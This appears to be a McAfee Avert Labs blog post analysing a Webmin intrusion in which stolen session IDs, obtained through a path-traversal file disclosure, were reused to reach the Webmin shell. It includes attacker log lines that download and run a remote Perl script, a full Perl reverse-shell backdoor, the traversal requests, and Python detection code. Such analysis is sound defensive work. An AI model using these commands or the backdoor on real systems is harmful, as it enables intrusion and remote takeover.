Webmin SessionID Hacking - McAfee Avert Labs Blog
Tuesday April 1, 2008 at 9:24 am CST
Posted by Xiao Chen
I made some interesting observations recently while looking through Webmin logs. It seems that someone was playing with Webmin worm/autorooter tools. Here is a piece of the webmin log:
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;uname -a;id;uptime'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;unset HISTFILE HISTLOG HISTSAVE SCREEN'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;ls'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;wget aa.bb.cc/d.pl'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;cat /etc/issue'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;perl d.pl 2.2.2.2 2008'
Here we can see some suspicious activity. In particular, the Webmin root user connects from 1.1.1.1 and tries to download and execute a Perl script from aa.bb.cc on the system hosting Webmin. The script spawns a shell and connects it back to 2.2.2.2 on port 2008.
#!/usr/bin/perl
use Socket;
print "Data [removed] Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print "\nDumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "\nConnecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "\nSpawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "" x 4;
exit(0);
}
print "\nDatached\n\n";
By examining the Webmin log in further detail, it was possible to determine that the attacker used an older Webmin vulnerability (the Webmin Arbitrary File Disclosure Vulnerability, CVE-2006-3392) to retrieve the webmin.log and sessiondb.pag files.
1.1.1.1 - - [02/Feb/2008:06:31:34 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/webmin.log HTTP/1.0" 200 390944
1.1.1.1 - - [02/Feb/2008:06:31:42 +0800] "GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/sessiondb.pag HTTP/1.0" 200 1024
The attacker then tried to access Webmin’s /shell/index.cgi page as follows:
1.1.1.1 - root [02/Feb/2008:06:31:46 +0800] "POST /shell/index.cgi HTTP/1.1" 200 4921
We know that access to /shell/index.cgi requires authentication with a valid Webmin user and the corresponding password. However, the attacker was able to access this resource without supplying a password (the HTTP response code is 200). This was possible because Webmin stores user session ID values in the webmin.log and sessiondb.pag files. If an attacker can retrieve these files, they can re-use the session ID of a user to access resources as that user without having to supply a password.
For example, here is an entry in webmin.log:
[04/02/2008 15:26:59] root f3fe4b90803a41096af8880e2e948a24 x.x.x.x proc run.cgi "run" "-" "-" cmd='ifconfig -a' input='' mode='0'
"f3fe4b90803a41096af8880e2e948a24" is the session ID in this entry. These session IDs remain valid for one week unless the user explicitly logs out of the Webmin interface by clicking the "logout" link. Since most users don't do this, most session IDs continue to be valid long after they are needed. An attacker using a file disclosure vulnerability such as the one described above can attempt to retrieve and reuse these session IDs to impersonate users. Impersonating users in this manner can lead to complete compromise of affected systems, because /shell/index.cgi can be used to execute arbitrary commands.
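The two log patterns described above (a traversal fetch of webmin.log or sessiondb.pag under /unauthenticated/ followed by a 200 on /shell/index.cgi, and one session ID appearing from more than one source address) can be checked mechanically. The following is an added example, not code from the post or from Webmin; the log lines it parses are constructed in the formats quoted above, with made-up IPs and session IDs.

```python
import re
from collections import defaultdict

# Constructed sample lines (values made up) in the two formats quoted in the post:
# Webmin's action log (webmin.log) and miniserv's HTTP access log.
ACTION_LOG = """\
[04/02/2008 15:26:59] root f3fe4b90803a41096af8880e2e948a24 10.0.0.5 proc run.cgi "run" "-" "-" cmd='ifconfig -a' input='' mode='0'
[04/02/2008 16:02:10] root f3fe4b90803a41096af8880e2e948a24 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
[04/02/2008 16:03:44] admin 0123456789abcdef0123456789abcdef 10.0.0.7 proc index.cgi "view" "-" "-"
"""
ACCESS_LOG = """\
1.1.1.1 - - [02/Feb/2008:06:31:34 +0800] "GET /unauthenticated/..%01/..%01/..%01/var/webmin/webmin.log HTTP/1.0" 200 390944
1.1.1.1 - - [02/Feb/2008:06:31:42 +0800] "GET /unauthenticated/..%01/..%01/..%01/var/webmin/sessiondb.pag HTTP/1.0" 200 1024
1.1.1.1 - root [02/Feb/2008:06:31:46 +0800] "POST /shell/index.cgi HTTP/1.1" 200 4921
10.0.0.7 - admin [02/Feb/2008:07:00:00 +0800] "GET /proc/index.cgi HTTP/1.1" 200 800
"""
# Action log: optional "[date time]" prefix, then user, 32-hex session ID, source IP.
ACTION_RE = re.compile(r'^(?:\[[^\]]+\]\s+)?(\S+)\s+([0-9a-f]{32})\s+(\S+)')
# Access log: client IP, ident, user, [timestamp], "METHOD path proto", status.
ACCESS_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Dot-dot traversal as seen in the post (..%01/), plus plain and %2f-encoded forms.
TRAVERSAL_RE = re.compile(r'\.\.(?:%01|%2f|/)', re.IGNORECASE)

def sessions_used_from_multiple_ips(action_log):
    """Session IDs seen from more than one source IP, mapped to their sorted IPs."""
    seen = defaultdict(set)
    for line in action_log.splitlines():
        m = ACTION_RE.match(line)
        if m:
            user, sid, ip = m.groups()
            seen[(user, sid)].add(ip)
    return {sid: sorted(ips) for (_, sid), ips in seen.items() if len(ips) > 1}

def disclosure_then_shell(access_log):
    """IPs that got HTTP 200 on a traversal under /unauthenticated/ and later on /shell/index.cgi."""
    disclosed, flagged = set(), []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, _user, _method, path, status = m.groups()
        if status != "200":
            continue
        if path.startswith("/unauthenticated/") and TRAVERSAL_RE.search(path):
            disclosed.add(ip)
        elif path.startswith("/shell/index.cgi") and ip in disclosed and ip not in flagged:
            flagged.append(ip)
    return flagged

if __name__ == "__main__":
    print(sessions_used_from_multiple_ips(ACTION_LOG))  # session reused from a second IP
    print(disclosure_then_shell(ACCESS_LOG))            # IPs with disclosure followed by shell access
```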
If you still run a vulnerable Webmin, update it immediately, or rename the /shell/index.cgi script so that an attacker cannot use it to execute arbitrary commands. This attack vector has been automated and is already being actively used in the wild.
Computer Security Research - McAfee Avert Labs Blog.